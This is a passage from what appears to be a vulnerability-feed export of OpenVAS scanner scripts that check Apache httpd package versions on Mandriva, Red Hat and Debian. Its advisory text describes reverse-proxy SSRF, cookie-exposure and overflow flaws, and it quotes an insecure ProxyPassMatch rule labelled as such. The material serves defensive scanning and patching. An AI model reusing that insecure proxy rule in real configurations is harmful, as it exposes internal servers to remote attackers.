rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", rpm:\"apache-modules~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.9~12.15mdvmes5.2\", 
rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.15mdvmes5.2\", rls:\"MNDK_mes5.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\nif(release == \"MNDK_2010.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-base\", rpm:\"apache-base~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-devel\", rpm:\"apache-devel~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-htcacheclean\", rpm:\"apache-htcacheclean~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_authn_dbd\", rpm:\"apache-mod_authn_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_cache\", rpm:\"apache-mod_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dav\", rpm:\"apache-mod_dav~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_dbd\", 
rpm:\"apache-mod_dbd~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_deflate\", rpm:\"apache-mod_deflate~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_disk_cache\", rpm:\"apache-mod_disk_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_file_cache\", rpm:\"apache-mod_file_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ldap\", rpm:\"apache-mod_ldap~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_mem_cache\", rpm:\"apache-mod_mem_cache~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy\", rpm:\"apache-mod_proxy~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_ajp\", rpm:\"apache-mod_proxy_ajp~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_proxy_scgi\", rpm:\"apache-mod_proxy_scgi~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_reqtimeout\", rpm:\"apache-mod_reqtimeout~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_ssl\", rpm:\"apache-mod_ssl~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-modules\", 
rpm:\"apache-modules~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mod_userdir\", rpm:\"apache-mod_userdir~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-event\", rpm:\"apache-mpm-event~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-itk\", rpm:\"apache-mpm-itk~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-peruser\", rpm:\"apache-mpm-peruser~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-prefork\", rpm:\"apache-mpm-prefork~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-mpm-worker\", rpm:\"apache-mpm-worker~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.15~3.6mdv2010.2\", rls:\"MNDK_2010.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:05", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-07-09T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1391-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:870617", "href": "http://plugins.openvas.org/nasl.php?oid=870617", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1391-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n It was discovered that mod_proxy_ajp incorrectly returned an "Internal\n Server Error" response when processing certain malformed HTTP requests,\n which caused the back-end server to be marked as failed in configurations\n where mod_proxy was used in load balancer mode. 
A remote attacker could\n cause mod_proxy to not send requests to back-end AJP (Apache JServ\n Protocol) servers for the retry timeout period or until all back-end\n servers were marked as failed. (CVE-2011-3348)\n\n Red Hat would like to thank Context Information Security for reporting the\n CVE-2011-3368 issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736592)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00015.html\");\n script_id(870617);\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-09 10:34:25 +0530 (Mon, 09 Jul 2012)\");\n script_cve_id(\"CVE-2011-3348\", \"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1391-01\");\n script_name(\"RedHat Update for httpd RHSA-2011:1391-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.15~9.el6_1.3\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:25", "description": "Check for the Version of httpd", "cvss3": {}, "published": "2012-02-27T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0323-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", 
"CVE-2012-0053", "CVE-2011-3368"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:870571", "href": "http://plugins.openvas.org/nasl.php?oid=870571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. 
(CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon will be restarted automatically.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v.
5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_id(870571);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"RHSA\", value: \"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:04", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-02-27T00:00:00", "type": "openvas", "title": "RedHat Update for httpd RHSA-2012:0323-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2019-03-12T00:00:00", "id": "OPENVAS:1361412562310870571", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2012:0323-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2012-February/msg00063.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870571\");\n script_version(\"$Revision: 14114 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-12 12:48:52 +0100 (Tue, 12 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-27 11:17:07 +0530 (Mon, 27 Feb 2012)\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2012-0031\",\n \"CVE-2012-0053\", \"CVE-2011-3368\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"RHSA\", value:\"2012:0323-01\");\n script_name(\"RedHat Update for httpd RHSA-2012:0323-01\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_5\");\n script_tag(name:\"affected\", value:\"httpd on Red Hat Enterprise Linux (v. 5 server)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the fix for CVE-2011-3368 (released via\n RHSA-2011:1392) did not completely address the problem. 
An attacker could\n bypass the fix and make a reverse proxy connect to an arbitrary server not\n directly accessible to the attacker by sending an HTTP version 0.9 request.\n (CVE-2011-3639)\n\n The httpd server included the full HTTP header line in the default error\n page generated when receiving an excessively long or malformed header.\n Malicious JavaScript running in the server's domain context could use this\n flaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\n An integer overflow flaw, leading to a heap-based buffer overflow, was\n found in the way httpd performed substitutions in regular expressions. An\n attacker able to set certain httpd settings, such as a user permitted to\n override the httpd configuration for a specific directory using a\n '.htaccess' file, could use this flaw to crash the httpd child process or,\n possibly, execute arbitrary code with the privileges of the 'apache' user.\n (CVE-2011-3607)\n\n A flaw was found in the way httpd handled child process status information.\n A malicious program running with httpd child process privileges (such as a\n PHP or CGI script) could use this flaw to cause the parent httpd process to\n crash during httpd service shutdown. (CVE-2012-0031)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. 
After installing the updated\n packages, the httpd daemon will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~63.el5_8.1\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-24T12:50:46", "description": "The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.", "cvss3": {}, "published": "2012-02-13T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2405-1 (apache2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:70724", "href": "http://plugins.openvas.org/nasl.php?oid=70724", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2405_1.nasl 6612 2017-07-07 12:08:03Z cfischer $\n# Description: Auto-generated from advisory DSA 2405-1 
(apache2)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been found in the Apache HTTPD Server:\n\nCVE-2011-3607:\n\nAn integer overflow in ap_pregsub() could allow local attackers to\nexecute arbitrary code at elevated privileges via crafted .htaccess\nfiles.\n\nCVE-2011-3368 CVE-2011-3639 CVE-2011-4317:\n\nThe Apache HTTP Server did not properly validate the request URI for\nproxied requests. In certain reverse proxy configurations using the\nProxyPassMatch directive or using the RewriteRule directive with the\n[P] flag, a remote attacker could make the proxy connect to an\narbitrary server. 
This could allow the attacker to access internal\nservers that are not otherwise accessible from the outside.\n\nThe three CVE ids denote slightly different variants of the same\nissue.\n\nNote that, even with this issue fixed, it is the responsibility of\nthe administrator to ensure that the regular expression replacement\npattern for the target URI does not allow a client to append arbitrary\nstrings to the host or port parts of the target URI. For example, the\nconfiguration\n\nProxyPassMatch ^/mail(.*) http://internal-host$1\n\nis still insecure and should be replaced by one of the following\nconfigurations:\n\nProxyPassMatch ^/mail(/.*) http://internal-host$1\nProxyPassMatch ^/mail/(.*) http://internal-host/$1\n\nCVE-2012-0031:\n\nAn apache2 child process could cause the parent process to crash\nduring shutdown. This is a violation of the privilege separation\nbetween the apache2 processes and could potentially be used to worsen\nthe impact of other vulnerabilities.\n\nCVE-2012-0053:\n\nThe response message for error code 400 (bad request) could be used to\nexpose httpOnly cookies.
This could allow a remote attacker using\ncross site scripting to steal authentication cookies.\n\n\nFor the oldstable distribution (lenny), these problems have been fixed in\nversion apache2 2.2.9-10+lenny12.\n\nFor the stable distribution (squeeze), these problems have been fixed in\nversion apache2 2.2.16-6+squeeze6\n\nFor the testing distribution (wheezy), these problems will be fixed in\nversion 2.2.22-1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2.2.22-1.\n\nWe recommend that you upgrade your apache2 packages.\";\ntag_summary = \"The remote host is missing an update to apache2\nannounced via advisory DSA 2405-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202405-1\";\n\nif(description)\n{\n script_id(70724);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3368\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_version(\"$Revision: 6612 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:03 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 11:19:29 -0500 (Mon, 13 Feb 2012)\");\n script_name(\"Debian Security Advisory DSA 2405-1 (apache2)\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
